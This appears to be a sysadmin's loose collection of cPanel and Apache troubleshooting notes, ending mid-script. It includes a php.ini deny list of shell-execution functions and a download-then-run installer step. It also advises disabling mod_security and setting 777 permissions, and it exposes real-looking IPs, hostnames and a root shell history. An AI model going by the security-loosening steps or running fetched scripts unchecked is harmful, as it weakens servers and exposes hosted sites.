available, shutting down This is caused by one or more processes running on the 443 (secure socket) port. To fix this problem first find the process ID's that are running on port 443:- fuser 443/tcp Out put of the command will show you list of processes running on 443 port no. Kill all process Kill -9 process id Restart httpd service. 4. Address already in use: make sock: could not bind to address 0.0.0.0:80 no listening sockets available, shutting down fuser 80/tcp Kill -9 process id 5. Error in error log : No space left on device: Couldn't create accept lock No space left on device: mod_rewrite: could not create rewrite_log_lock Configuration Failed Checking your disk shows that you have plenty of space. The problem is that apache didn't shut down properly, and it's left myriads of semaphore-arrays left, owned by my apache-user. ipcs -s | grep nobody Removing these semaphores immediately should solve the problem and allow apache to start. ipcs -s | grep nobody | perl -e 'while (<STDIN>) { @a=split(/\s+/); print `ipcrmsem $a[1]`}' restart http service. 6. Error Apache generates semaphores and when it can not generate more, you should get an error like this: "No space left on device:mod_rewrite: could not create_rewrite: could not create rewrite_log_lockConfiguration Failed" You should delete semaphores to fix it. Listing and deleting semaphores : # ipcs -s grep apache # ipcs -s grep apache perl -e 'while () { @a=split(/\s+/); print `ipcrm sem $a[1]`}' It should be fine now :) 7. If you are getting error when you restart apache server [root@server httpd]# service httpd restart Stopping httpd: [ OK ] Remaining processes: 26467 Stopping httpd: [ OK ] Starting httpd: Warning: SuexecUserGroup directive requires SUEXEC wrapper. Warning: SuexecUserGroup directive requires SUEXEC wrapper. Warning: SuexecUserGroup directive requires SUEXEC wrapper. Warning: SuexecUserGroup directive requires SUEXEC wrapper. Warning: SuexecUserGroup directive requires SUEXEC wrapper. Warning: SuexecUserGroup directive requires SUEXEC wrapper. Solution : You need to set the sticky bit for suexec. below is my path, so your suexec may be in a different place. refer to the link On shell httpd -V |grep -i suexec it will give path for suexec like root@bond [~]# httpd -V |grep -i suexec -D SUEXEC_BIN="/usr/local/apache/bin/suexec" root@bond [~]# httpd -V |grep -i suexec -D SUEXEC_BIN="/usr/local/apache/bin/suexec" root@bond [~]# ll /usr/local/apache/bin/suexec -rwxr-xr-x 1 root root 18190 Jan 23 11:03 /usr/local/apache/bin/suexec* root@bond [~]# chmod 4755 /usr/local/apache/bin/suexec SET sticky bit root@bond [~]# ll /usr/local/apache/bin/suexec -rwsr-xr-x 1 root root 18190 Jan 23 11:03 /usr/local/apache/bin/suexec* Q 9. Main apache modules a. mod_rewrite b. mod_security a. mod_rewrite Mod_rewrite allows you to rewrite a webpage's url on the fly, and you can rewrite the url to almost anything. It has a lot of uses everything from redirecting multiple WebPages to a new domain without actually changing the title, to making dynamic pages appear static. However, it is somewhat complicated to learn, and if you make a mistake its also possible to really mess-up your server and create endless loops. Need less to say I don't recommend messing around with this on you live site. The solution, if you want to mess around and experiment with it is, to run a test server on your own computer for test purposes. Apache by default comes with the mod_rewrite module installed but not enabled This module operates on the full URLs (including the path-info part) both in per-server context (httpd.conf) and per-directory context (.htaccess) and can even generate query-string parts on result. The rewritten result can lead to internal sub-processing, external request redirection or even to an internal proxy throughput. Configuration Directives * RewriteEngine * RewriteOptions * RewriteLog * RewriteLogLevel * RewriteLock * RewriteMap * RewriteBase * RewriteCond * RewriteRule How to check if mod_rewrite is enabled on server 1. Create one directory in your account. 2. create one .htaccess file in it Options +FollowSymLinks RewriteEngine On save the above code in it. 3. Run the directory in browser 4. If - - No errors Congrats mod_rewrite engine is now enabled. - 500, Internal Server Error If you get this message then mod_rewrite was not installed/enabled on your computer. mod_security mod_security help to protect your server from exploits that are passed though apache. Mod_security does this by inspecting the information sent in apache and filtering out all of the "bad" requests as determined by the set of rules specified in the httpd.conf. How to disable mod_security on server comment out (put a # in front of) the AddModule mod_security.c line and restart apache How to disable mod_security for that individual account ? Error : [Sat Feb 07 08:14:37 2009] [error] [client 79.133.23.23] ModSecurity: Access denied with code 501 (phase 2). Match of "rx (?:^(?:application\\\\/x-www-form-urlencoded(?:;(?:\\\\s?charset\\\\s?=\\\\s?[\\\\w\\\\d\\\\-]{1,18})?)??$|multipart/form-data;)|text/xml)" against "REQUEST_HEADERS:Content-Type" required. [id "960010"] [msg "Request content type is not allowed by policy"] [severity "WARNING"] [hostname "www.nuclearfreefinland.org"] [uri "/admin/build/views/ajax/config-item/calendar/default/filter/status"] [unique_id "61e4N0g3s7cAAB0CYsUAAAAD"] Error : Your webserver has the mod_security module enabled. As a result, you may see the "403 Forbidden" or "Not Acceptable" error messages after submitting forms that contain "curl", "perl", "set", etc. It is recommended to disable this module or reconfigure it so that these words are not forbidden. If you are receiving the error for mod_security, access denied with error code 403 when you check the error logs for any account. You can disable the mod_security for that account by adding a simple code in his .htaccess <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> path Include "/usr/local/apache/conf/modsec2.conf" Php.ini php.ini file • What is php.ini file The php.ini file is where you declare changes to your PHP settings. You can edit the existing php.ini, or create a new text file in any subdirectory and name it php.ini. • How to locate php.ini file find / -name php.ini locate php.ini • Path of php.ini file /usr/local/lib/php.ini /usr/lib/php.ini /var/cpanel/3rdparty/lib/php.ini • Main options in php.ini * open_basedir = Error : open_basedir restriction in effect Solution : Security >> Security Center >> Tweak PHP open_basedir Security *. disable_functions = dl, system, passthru, popen, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid * Resource Limits max_execution_time = 30 ; Maximum execution time of each script, in seconds max_input_time = 60 ; Maximum amount of time each script may spend parsing request data memory_limit = 32M ; Maximum amount of memory a script may consume (32MB) * display_errors = Off Print out errors as a part of output. Keep it off * log_errors_max_len = 1024 Error log file size is set to 1024 bytes. * magic_quotes_gpc = On Magic quotes for incoming GET/POST/Cookie data. * upload_max_filesize = 16M Maximum allowed size for uploaded files. * * allow_url_fopen = Off As long as allow_url_fopen is enabled in php.ini, you can use HTTP and FTP URLs with most of the functions that take a filename as a parameter. In addition, URLs can be used with the include(), include_once(), require() and require_once() statements (since PHP 5.2.0, allow_url_include must be enabled for these). See List of Supported Protocols/Wrappers for more information about the protocols supported by PHP. * session.save_path = /tmp session.save_path defines the argument which is passed to the save handler. If you choose the default files handler, this is the path where the files are created .htaccess Apache allows for decentralized management of configuration via special files placed inside the web tree. The special files are usually called .htaccess, but any name can be specified in the AccessFileName directive. Directives placed in .htaccess files apply to the directory where you place the file, and all sub-directories. The .htaccess files follow the same syntax as the main configuration files. Since .htaccess files are read on every request, changes made in these files take immediate effect. Using .htaccess is enabled or not? <Directory "/"> Options All AllowOverride All </Directory> # In the server configuration file, put # # <Directory /> # AllowOverride None # </Directory> # # This prevents the use of .htaccess files in all directories apart from those specifically enabled. PHPSuExec Explained This webpage will explain file/directory permissions, the differences between running PHP as an Apache module and running PHP as a CGI with Suexec, and it will also touch on some common problems experienced when running PHP as a CGI with Suexec. A Brief Overview on File Permissions 0400 read by user 0200 write by user 0100 execute by user 0040 read by group 0020 write by group 0010 execute by group 0004 read by world 0002 write by world 0001 execute by world By adding the permissions together, you will come up with the number that corresponds to the permission. For example, 400+200+100+40+20+10+4+2+1=777 - read/write/execute by user/group/world. What is PHPSuexec? PHPSuexec is the shortened term often used to describe running PHP as a CGI with Suexec. Running PHP as a CGI with Suexec creates a much more secure environment compared to running PHP as an Apache module. Below we will describe the differences in the two forms of PHP, with examples on how security differs with the two. PHP as an Apache Module When PHP runs as an Apache module, PHP files work under the Apache user/group known as "nobody". For example, when a PHP file needs to write to another file or create/remove a file, it does so under the name "nobody". In order to allow "nobody" to do this, you need to set specific permissions on the file/directory, such as 777 - which translates to read/write/execute by user/group/world. This is insecure because you have not only allowed the webserver (Apache) to read/write to the file, you have also allowed everyone else on the server to read/write to the file as well! Due to the above conditions, when a PHP file creates or uploads a new file under your account, the new file will be owned by the user "nobody". If you FTP into your account, all files owned by "nobody" will not be available for you to move, rename or delete. In this case the only way to remove the "nobody" owned files would be through a file on the server or to contact support and ask for the file ownership to be changed back to your username. PHP as a CGI with Suexec When PHP runs as a CGI with Suexec, PHP files work under your user/group. PHP files no longer require loose permissions to function, now they will require strict permissions. Setting your directories or PHP files to 777 will cause them to produce a 500 Internal Server Error, this happens to protect your PHP files from being abused by outside sources. Under PHPSuexec your directories and PHP files can have permissions no greater than 755 (read/write/execute by your username, read/execute by group/world). Since you own your files, your scripts can function in any directory your user has created and can't be manipulated by any outside users, including "nobody". Now, when a PHP file creates or uploads a new file under your account, the new file will be owned by your username. You will no longer have to worry about the webserver taking over your files and even more important, you will no longer have to worry about a stranger reading or writing to your files either! .htaccess When PHP runs as an Apache module you are able to manipulate PHP using .htaccess - since .htaccess is an Apache feature. When PHP runs as a CGI, you can no longer do this because Apache no longer understand the PHP flags and values. Instead, when PHP runs as a CGI, you will need to create your own PHP initialization file, this file is called php.ini -- php.ini works almost the same as .htaccess -- it is simply a text file with directives that will be used instead of the servers default directives. To give you a better understanding about how both work in regards to PHP, we have listed a .htaccess file and a php.ini file below. .htaccess php_value magic_quotes_gpc on php.ini magic_quotes_gpc = on There is one main difference to the use of .htaccess vs php.ini -- a .htaccess file can be placed at the root directory and effect all subdirectories with just 1 file, php.ini does not work this way. A php.ini file needs to be placed in every directory and subdirectory that requires the altered directives. This is a downfall for using PHPSuexec, however we hope that in the future PHP can be written to handle the php.ini file in a more workable fashion.. Last but not least, there is a directive used in .htaccess that needs to be altered in order to work under PHPSuexec. The directive ForceType needs to be changed to SetHandler. For example: PHP as an Apache Module .htaccess Style ForceType application/x-httpd-php PHP as a CGI with Suexec .htaccess Style SetHandler application/x-httpd-php It is important to understand that you can still use .htaccess for a variety of Apache functions, such as mod_rewrite directives, password protection directives, etc. The only difference is that it can no longer process PHP directives. How to check if phpsuexec is enabled on the server : You can easily check if your server has phpsuexec enabled by accessing your server’s phpinfo Simply look for the box which show ‘Server API’ :- “Server API: Apache” , this means that your server is currently running php as an Apache module. If within the phpinfo page you see the following:- “Server API: CGI”, then your server has a CGI installation of PHP with suexec enabled. Common Problems experienced with PHPSuexec If your PHP scripts are reporting 500 Internal Server errors, please check the following: * Make sure the directory permissions the PHP file is in are no greater than 755 * Make sure the PHP file permissions are no greater than 755 - 644 is the default permissions for files uploaded by FTP and will work fine for most PHP files. * Make sure you do not have any .htaccess files which contain PHP flags/values or ForceType directives. These directives need to be handled differently, as explained above. Courtesy of hostmagik. By default PHP on WHM/Cpanel is loaded as DSO (Dynamic Shared Object) module and is run by the user “nobody” by default. Though this method of loading the PHP module is normally the fastest way to serve PHP request, running it as using user “nobody” will be a real pain in the ass if you are serving multiple sites run by multiple users, you will be for sure run into file permission problems. This is where the SuExec comes in play, every executed PHP scripts will be executed by the user who owns the VirtualHost that is server the request, this method has a lot of drawbacks too on both speed and security. Anyway, if you still want to enable it then read on below. 1. Login to your Web Host Manager as root account then under the Service Configuration menu, look for the “Configure PHP and SuExec” and click on it. 2. On the “Configure PHP and SuExec” page, under “alter configuration” section, look for the PHP handlers and then change its values to “cgi” and then set the Apache SuExec to On. (by default the value is on) 3. Finally, click on “Save new configuration” button and wait til the Apache server restarted and your done. To verify that SuExec is working as intended, try to upload a file or create a folder using an upload file script on PHP. How to enable Choose Log Programs for Awstats from cPanel : 1. Go tot Statistics Software Configuration option from WHM 2. Under User Permissions section click on Choose which specific users can modify their web generating software. Choose users button 3. add the perticular user and configure and check cpanel again. It will get enabled. If web logs are not working for addon domains then set the config file for the addon doamin a)LogFile="/usr/local/apache/domlogs/lolcritters.com" b)DirData="/home/tradesma/tmp/awstats c)SiteDomain="lolcritters.com" MinMax Servers - Configure Backup _________________________________ Overview: Keeping 2 sets of backup data is not possible due to the fact that the primary/secondary drives on the servers are the same size, and the primary drive is often over 70% full, attempting to keep 2 backup sets is causing all backups to fail. Solution: Keep a single weekly backup set (we set it as daily run once per week) and shortly add a daily backup for dynamic data (i.e. MySQL Databases) This configuration is to be set in all servers WHM at Backup > Configure Backup Backup Status: [X] Enabled Backup Interval: [X] Daily (Weekly/Monthly NOT selected) Backup Retention: [X] Daily (Weekly/Monthly NOT selected) Days to Run Backup: Saturday Remount/Unmount Backup Drive [X] Disabled Bail Out If Backup Drive Mount Fails [X] Disabled Incremental Backup: [X] Enabled Backup Accounts : [X] Enabled Compress Account Backups: [X] Disabled Backup Configuration Files: [X] Enabled Backup SQL Databases [X] Per Account and Entire MySQL Directory Backup Access Logs [X] Disabled Backup Type Standard N/A Remote FTP Host | FTP Backup User | FTP Backup Password | FTP Backup Directory | FTP Backup Passive Mode: N/A Backup Destination /backup Notes: _____ - Remove Any Weekly / Monthly Backup directories from the /backup drive - cPanel Backup State & Disk Usage monitored by Nagios (in my dreams) - Don't backup accounts over 5GB - Instruct clients on the importance of backing up their data daily. - Ensure Service Agreement details the Service Level - Offer clients a daily backup service as a paid upgrade Bash History : ========= root@rhodium [~]# tail -100 ~/.bash_history /etc/init.d/httpd restart w pico /var/spool/cron/root /etc/init.d/crond restart w cd /backup/cpbackup/ cd daily/ ll /scripts/cpbackup --force ll ping bassxplod.com w mail -vv test@ororico.com hostname -i top -cd2 vi /usr/local/nagios/etc/nrpe.cfg exit df -h ping aksipert.com top -cd2 /scripts/whoowns milliondollargoal.net cd ~ilovered cd /backup/cpbackup/daily/ ll | grep ilovered /etc/init.d/pure-ftpd restart nano /usr/local/lib/php.ini cat /etc/pure-ftpd.conf nano /etc/pure-ftpd.conf nano /usr/local/lib/php.ini /scripts/whoowns milliondollargoal.net cd ~ilovered cd public_html/ ll nano .htaccess /etc/init.d/httpd restartr /etc/init.d/httpd restart /etc/init.d/pure-ftpd restart /etc/init.d/pure-ftpd restart nano .htaccess /etc/init.d/pure-ftpd restart ll /scripts/restartsrv_pureftpd cd /usr/local/nagios/libexec/ vi check_crond chmod 755 check_crond vi /usr/local/nagios/etc/nrpe.cfg /etc/init.d/xinetd restart w top -cd2 clear poweroff service network start mii-tool mii-tools clear update-inintramfs clear ifconfig eth0 up modprobe e1000 depmod depmod -a clear cd /etc/sysconfig/network-scripts/ ls vi ifcfg-eth0 ifconfig ifconfig -a clear "ls" cd ls cat .bashrc clear cd /etc/sysconfig/network-scripts/ "ls" ifup eth0 ifup eth1 ifup eth0 clear ping 4.2.2.2 service network start root /etc/init.d/ipaliases start cat /etc/ips ifconfig ifup eth0 exit mkinitrd mount /dev/sda1 /mnt/boot mount /dev/sda1 /mnt/boot fdisk -l mount /proc fdisk -l exit df -h mkinitrd mkinitrd --preload sd_mod --preload sata_mod --preload scsi_mod --preload ata_piix /boot/initrd-2.6.18-194.11.4.el5.img.sam 2.6.18-194.11.4.el5 mkinitrd --preload sd_mod --preload scsi_mod --preload ata_piix /boot/initrd-2.6.18-194.11.4.el5.img.sam 2.6.18-194.11.4.el5 passwd exit Big.NSJET Update php.conf updated to: # This file was automatically generated by the Cpanel PHP Configuration system # If you wish to change the way PHP is being handled by Apache on your system, # use the /usr/local/cpanel/bin/rebuild_phpconf script or the WHM interface. # # Manual edits of this file will be lost when Apache is updated. # LibPHP5 configuration LoadModule php5_module modules/libphp5.so AddType application/x-httpd-php .php5 .php4 .php .php3 .php2 .phtml # End of autogenerated PHP configuration. Updating user configurable PHP settings. [info] recursion depth is set to: 2 Restarting Apache These settings are now active. The MIME types associated with PHP may have changed. If you experience problems with PHP related settings in .htaccess files, ensure those files use the MIME types specified above (the first value listed after AddType.) Blank page with WordPress… How to Fix that ? Maybe this helps someone…. when you see blank page with your WordPress blog you can use my tips to find bug and fix that annoying problem. 1. Turn off all plugins 2. Change theme to another one (refresh/check) 3. Creates or/and update .htaccess file (you can browse it by linux console for example) 4. Edit and save post, permalinks…. stuff like that 5. Update to newest version of WordPress 6. Check what PHP version you have 7. Check this out: WordPress should compress articles (gzip) if browsers ask for them … in my situation this fix my blank page error. 8. Check error logs if there is something interesting about your problem This (point 7) helps me with my CSS gallery. But I also generate problem with SilenBits and it was blank too…. the problem solved when i use this fix: 2. Change theme to another one (refresh/check) So good luck and no WordPress blank pages for you !You can add the coutry below to block. DirectoryIndex index.php index.html GeoIPEnable On # SetEnvIf GEOIP_COUNTRY_CODE TR BlockCountry SetEnvIf GEOIP_COUNTRY_CODE VN BlockCountry SetEnvIf GEOIP_COUNTRY_CODE BR BlockCountry SetEnvIf GEOIP_COUNTRY_CODE NG BlockCountry SetEnvIf GEOIP_COUNTRY_CODE A2 BlockCountry SetEnvIf GEOIP_COUNTRY_CODE MA BlockCountry SetEnvIf GEOIP_COUNTRY_CODE IR BlockCountry SetEnvIf GEOIP_COUNTRY_CODE A1 BlockCountry SetEnvIf GEOIP_COUNTRY_CODE DZ BlockCountry SetEnvIf GEOIP_COUNTRY_CODE PS BlockCountry SetEnvIf GEOIP_COUNTRY_CODE KE BlockCountry SetEnvIf GEOIP_COUNTRY_CODE TN BlockCountry # ... place more countries here Deny from env=BlockCountry # Optional - use if you want to allow a specific IP address from the country you denied # (See http://httpd.apache.org/docs/1.3/mod/mod_access.html for more details) Allow from 10.1.2.3 <Files 403.shtml> order allow,deny allow from all </Files> deny from 77.105.18.33 deny from 123.237.228.239 ****************************************************** Also you need to block the country from WHM go to WHM >> Firewall configurations >> find CC_deny option and place the country code and restart csf. ****************************************************** If you found any domain which is causing the attack, copy the below code into his accounts .htacess to him from the server. # SetEnvIf GEOIP_COUNTRY_CODE TR BlockCountry SetEnvIf GEOIP_COUNTRY_CODE VN BlockCountry SetEnvIf GEOIP_COUNTRY_CODE BR BlockCountry SetEnvIf GEOIP_COUNTRY_CODE NG BlockCountry SetEnvIf GEOIP_COUNTRY_CODE A2 BlockCountry SetEnvIf GEOIP_COUNTRY_CODE MA BlockCountry SetEnvIf GEOIP_COUNTRY_CODE IR BlockCountry SetEnvIf GEOIP_COUNTRY_CODE A1 BlockCountry SetEnvIf GEOIP_COUNTRY_CODE DZ BlockCountry SetEnvIf GEOIP_COUNTRY_CODE PS BlockCountry SetEnvIf GEOIP_COUNTRY_CODE KE BlockCountry SetEnvIf GEOIP_COUNTRY_CODE TN BlockCountry # ... place more countries here ***************************************************************************************************************************************** HLOAD /usr/bin/lynx -width=1000 -with_backspaces -dump http://127.0.0.1/whm-server-status |grep GET |awk '{print $5 " " $11 " " $12" " $14}'|sort -ginr|head -$1 Block DO /usr/bin/lynx -dont_wrap_pre -dump http://127.0.0.1/whm-server-status |grep $1 |awk '{print "csf -d " $11}' ***************************************************************************************************************************************** >> Yes the server is responding fine when I try to telnet to port 3306 from remote location to the server. Please use the hostname address as 67.159.54.148, since the servers IP has been changed. To ensure the remote connectivity, you can go to your local machines command prompt and do: telnet 67.159.54.148 3306 >> I see, but its odd that it takes so long to establish a connection to itself this could why it times out when it attempts a remote connection. >> When I try to do telnet to the 3306 port, it responds quickly with the established connection. You may also need to check that the port 3306 is not blocked in your local machines firewall. cgiemail shows Internal server error from cpanel while installing cgi-email CGIEmail is another form processing script, totally different than FormMail. Some cpanel user uses this script for form processing but due to some server configuration it shows error "Internal server error" . Please follow the steps provided. 1) Login to cpanel and goto file manager 2) Then delete these four files cgiecho ,cgiemail ,entropybanner.cgi ,randhtml.cgi from cgi-bin folder 3) Then goto cpanel>>CGI center and click on the CGI email. http://www.myname.com/cgi-bin/cgiemail/ contactu.html <FORM METHOD="POST" ACTION="http://www.tri-stateparalegalservices.com/cgi-bin/cgiemail/contact.txt"> <INPUT TYPE="hidden" NAME="success" VALUE="http://www.tri-stateparalegalservices.com/thanks_for_your_message.htm"> <div align="center"> <table width="539" border="0" cellspacing="5"> <tr><td><div align="right">Your Email Address:</div></td> <td><INPUT NAME="email"></td></tr><tr> <td><div align="right">Name:</div></td> <td><INPUT NAME="yourname"></td></tr> <tr><td><div align="right">Company Name:</div></td> <td><INPUT NAME="coname"></td></tr> <tr><td><div align="right">Address / Location:</div></td> <td><INPUT NAME="address" size="50"></td></tr> <tr><td><div align="right">Phone Number:</div></td> <td><INPUT NAME="phone"></td></tr> <tr><td><div align="right">Subject: </div></td> <td><INPUT NAME="submess" size="30"></td></tr> <tr><td valign="top"><div align="right">Message:</div></td> <td><textarea name="message" cols="50" rows="10"></textarea></td></tr> <tr><td height="30"> </td> <td valign="top"><INPUT name="submit" TYPE="submit" value="Send Message"></td></tr> </table> </div> </FORM> ******************************************************************************************************* thanks_for_your_message.html <html> <body> Thank you. </body> </html> ******************************************************************************************************* contact.txt >> create this file within cgi-bin folder and make 755 . To: test@tri-stateparalegalservices.com Subject: Message submitted on Website Name [yourname] Company Name [coname] Address [address] Phone Number [phone] Subject of Message [submess] Message [message] ******************************************************************************************************* <form action="http://www.myhomeestates.co.uk/cgi-bin/cgiemail/test.txt" method="post" name="ResponseForm"> Name <input name="name" type="text" /><br /> Address<br /> <textarea name="address" style="width: 136px; height: 65px"></textarea><br /> Vendor/Landlord <input name="Radio1" type="radio" value="1" /><br /> Tennant <input checked="checked" name="Radio1" type="radio" /><br /> Purchaser<input name="Radio1" type="radio" /><br /> Telephone Number<br /> <input name="telephonenumber" type="text" /><br /> Property Requirements<br /> <textarea name="propertyrequirements" style="width: 139px; height: 63px"></textarea><br /> <input name="Submit1" type="submit" value="submit" /> <br /> <br /> </form> Save this as contact_us.html inside main domain name folder >> public_html ********************************************************************************************************** Create now a .txt file EX. test.txt To: sales@myhomeestates.co.uk Subject: Email Enquiry - My Home Estates name [name] address [address] telephone number [telephonenumber] property reqiurements [propertyrequirements] Save this file inside cgi-bin folder and also inside public_html folder and make 755 permissions. How do I change the Copyright message in the footer? If you make a custom template and use your own graphics you may change the copyright as follows: Open the includes/languages/english.php file in your text editor. Find the following lines of code. We will be changing the text starting with “Copyright” and ending with the first “Zen Cart”. define('FOOTER_TEXT_BODY', 'Copyright © 200* <a href="http://www.zen-cart.com" target="_blank">Zen Cart</a>. Powered by <a href="http://www.zen-cart.com" target="_blank">Zen Cart</a>'); Change the Copyright © 200* with your own text. Now replace the http://www.zen-cart.com url with a url that deals with your business or the url of your store. Finally replace “Zen Cart” with the name of you business. Save the edited file to includes/languages/CUSTOM/english.php and upload it to your server It is considered common courtesy to leave “Powered by Zen Cart" intact as it assists in advertising the Zen Cart project that is allowing you to create your new store and hopefully make money from it. If you want your shop listed in the Zen Showcase, you must leave "Powered by Zen Cart" in the footer for Identification. http://tutorials.zen-cart.com/index.php?article=131find -xtype d | xarge chmod 755 for directory find -xtype f | xarg chmod 755 for files find -xtype d | xarge chmod 777 set 777 to all directories find . -type f -exec chmod 644 {} \; find . -type d -exec chmod 755 {} \; vi /etc/ssh/sshd_configphp -i | grep Hi, I am not currently able to log into this server, the connection times out. ssh -l 3gteam 66.7.202.240 -p1097 ssh: connect to host 66.7.202.240 port 1097: Connection timed out However, I suspect that as with many popular PHP scripts, Click Be does not work with PHP 5.3.x. If the server has PHP4 installed as well as PHP5, try switching the site to use PHP4 and see if that helps. If not, you may need to switch back to PHP 5.2.14 or discontinue use of ClickBe. Netenberg hasn't updated ClickBe for PHP 5.3 yet. If other sites using ClickBe on this server are working, then please check the access details you provided and we can take a closer look. Regards, CNAME and Mx Record lookup http://www.google.com/support/a/bin/answer.py?hl=en&answer=116393 dictionary http://www.cfilt.iitb.ac.in/~hdict/webinterface_user/dict_search_user.php http://www.shabdkosh.com/ mysql --database=achievin_clss2 -B -N -e "SHOW TABLES" | awk '{print "ALTER TABLE", $1, "CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci;"}' | mysql --database=achievin_clss2 & use this command after changing db name in two places on server. http://www.hscripts.com/tutorials/linux-commands/chkconfig.htmlCommon Exim issues and their fixes For the error "failed to open scan directory /var/spool/exim/scan/scan .. Too many links " If you see an error similar to the one above in exim log , check the files in the said dir , if it is filled up with files that are not needed feel free to remove them or move it elsewhere if customer need to verify it. Ex, reference tick id SUW-71887-854 Error should be something similar as shown in logs below, -bash-3.00# grep 1IOmvr-0005n7-Ry /var/log/exim_mainlog 2007-08-25 00:07:32 1IOmvr-0005n7-Ry failed to open scan directory /var/spool/exim/scan/scan/1IOmvr-0005n7-Ry: Too many links 2007-08-25 00:07:32 1IOmvr-0005n7-Ry malware acl condition: error while creating mbox spool file 2007-08-25 00:07:32 1IOmvr-0005n7-Ry H=py-out-1112.google.com [64.233.166.181] F=<pvpticks@gmail.com> temporarily rejected after DATA -bash-3.00# ls -al /var/spool/exim/scan/ | wc -l 32001 Exiscan fails to remove the dirs in it, finally ending up creating too many file/dir it can't handle. To fix, /var/spool/exim/scan/ was moved to /root and exim was restarted.Error like : Notice: Constant TRANSLATION2_ERROR already defined in /usr/local/lib/php/Translation2.php on line 55 Notice: Constant TRANSLATION2_ERROR_METHOD_NOT_SUPPORTED already defined in /usr/local/lib/php/Translation2.php on line 56 ************************************************************************** Issue: Errors with Translation2.php You have the following errors on your site: Notice: Constant TRANSLATION2_ERROR already defined in /usr/local/lib/php/Translation2.php on line 55 Notice: Constant TRANSLATION2_ERROR_METHOD_NOT_SUPPORTED already defined in /usr/local/lib/php/Translation2.php on line 56 Notice: Constant TRANSLATION2_ERROR_CANNOT_CONNECT already defined in /usr/local/lib/php/Translation2.php on line 57 Notice: Constant TRANSLATION2_ERROR_CANNOT_FIND_FILE already defined in /usr/local/lib/php/Translation2.php on line 58 Notice: Constant TRANSLATION2_ERROR_DOMAIN_NOT_SET already defined in /usr/local/lib/php/Translation2.php on line 59 Notice: Constant TRANSLATION2_ERROR_INVALID_PATH already defined in /usr/local/lib/php/Translation2.php on line 60 Notice: Constant TRANSLATION2_ERROR_CANNOT_CREATE_DIR already defined in /usr/local/lib/php/Translation2.php on line 61 Notice: Constant TRANSLATION2_ERROR_CANNOT_WRITE_FILE already defined in /usr/local/lib/php/Translation2.php on line 62 Notice: Constant TRANSLATION2_ERROR_UNKNOWN_LANG already defined in /usr/local/lib/php/Translation2.php on line 63 Notice: Constant TRANSLATION2_ERROR_ENCODING_CONVERSION already defined in /usr/local/lib/php/Translation2.php on line 64 Notice: Constant TRANSLATION2_ERROR_UNSUPPORTED already defined in /usr/local/lib/php/Translation2.php on line 65 Fatal error: Cannot redeclare class Translation2 in /usr/local/lib/php/Translation2.php on line 82 ** Solution: Please find the instructions to fix this issue below: 1. open the /system/ext/Translation2/Translation2.php file 2. add the line: if (false){ right after: <?php 3. add the line: } right before: ?> at the end of the file. Please let us know if it did not help you, and send us your FTP access in order we can help you.coppermine gallary issues and documentation http://documentation.coppermine-gallery.net/en/upload_troubleshooting.htm want to change "Copyright © 2003 Zen Cart. Powered by Zen Cart" How to change "Powered by Zen Cart" If you want to change the text at the bottom of the page "Copyright © 2003 Zen Cart. Powered by Zen Cart" you should edit the following file: \includes\languages --> english.php Here you can see a text you should modify. define('FOOTER_TEXT_BODY', 'Copyright © 2003 <a href="http://www.zen-cart.com" target="_blank">Zen Cart</a>. Powered by <a href="http://www.zen-cart.com" target="_blank">Zen Cart</a>'); Also: If you want to change a title bar text, you should edit the following file: \includes\languages\english --> meta_tags.php Here you can see 2 variables for this text. // page title define('TITLE', 'Zen Cart!'); // Site Tagline define('SITE_TAGLINE', 'The Art of E-commerce'); URL : http://info.template-help.com/after_sale_support/Working_with_ZenCart_templates/article3.html cPanel not showing quotas correctly So far this has only been reported on CPanel servers, but it may apply to other panels as well. There have been some reported cases of user quotas not being calculated correctly. The fix from sw-soft was to reinstall quota RPM from the template. From the hardware node, run: If RH9: for veid in `VEIDHERE`; do rpm -ivh --nodeps --root=/vz/root/$veid /vz/template/redhat-9/quota-3.06-9.3.swsoft.i386.vz.rpm --force; vzctl exec $veid "ln -sf /bin/true /sbin/quotaon && ln -sf /bin/true /sbin/quotaoff"; done If FC2: for veid in `VEIDHERE`; do rpm -ivh --nodeps --root=/vz/root/$veid /vz/template/fedora-core-2/quota-3.10-2.2.swsoft.i386.vz.rpm --force; vzctl exec $veid "ln -sf /bin/true /sbin/quotaon && ln -sf /bin/true /sbin/quotaoff"; done NOTE: `something in backticks` indicates your running some command to get the list of veids - like /root/bin/allVe.sh. If you not running a command, replace `VEIDHERE` with a list of VEIDs. The following also will help: (Replace VE_ID with the veid) veid=VE_ID; vzctl stop $veid; vzctl quotaoff $veid; vzctl quotainit $veid; vzctl start $veid; vzctl enter $veid /scripts/fixeverything (Contact Sergey for details ) For situations where quotas agree in du and WHM but the user CPanel does not, it's most likely the CPanel data cache that has become corrupted. Just remove the datacache file. rm -rf /home/USERNAME/.cpanel-datastore The next time the CPanel is refreshed, it will regenerate the information.rebuilding cPanel's internal PHP /scripts/makecpphp -force /usr/local/cpanel/logs/cpbackupHow To Set Up Cron Jobs In Cpanel http://calendarscripts.info/cron-jobs-tutorial.htmlcrontab -l -u username ( where l = list crontab) crontab -e -u username ( where e = edit crontab )csf.conf some parameters value : CT_LIMIT = "150" TESTING = "1" TCP_IN = "........,5666,............." note : 5666 nagios port http://www.configserver.com/free/csf/install.txt STEPS : 1.Uninstallation ============== Removing csf and lfd is even more simple: On cPanel servers: cd /etc/csf sh uninstall.sh 2.Installation ============ Installation is quite straightforward: rm -fv csf.tgz wget http://www.configserver.com/free/csf.tgz tar -xzf csf.tgz cd csf sh install.sh 3.csf.conf some parameters value : CT_LIMIT = "150" TESTING = "1" TCP_IN = "........,5666,............." note : 5666 nagios port 4. csf -r http://www.tizag.com/perlT/perldbiconnect.php connection of db using perl script #!/usr/bin/perl # PERL MODULES WE WILL BE USING use DBI; use DBD::mysql; # HTTP HEADER print "Content-type: text/html \n\n"; # CONFIG VARIABLES $platform = "mysql"; $database = "store"; $host = "localhost"; $port = "3306"; $tablename = "inventory"; $user = "username"; $pw = "password"; #DATA SOURCE NAME $dsn = "dbi:mysql:$database:localhost:3306"; # PERL DBI CONNECT (RENAMED HANDLE) $dbstore = DBI->connect($dsn, $user, $pw) or die "Unable to connect: $DBI::errstr\n"; **************************************************************************************** Another Script : http://sawaal.ibibo.com/computers-and-technology/how-we-connect-database-control-panel-ftp-server-480285.html #!/usr/bin/perl use DBI; $database = 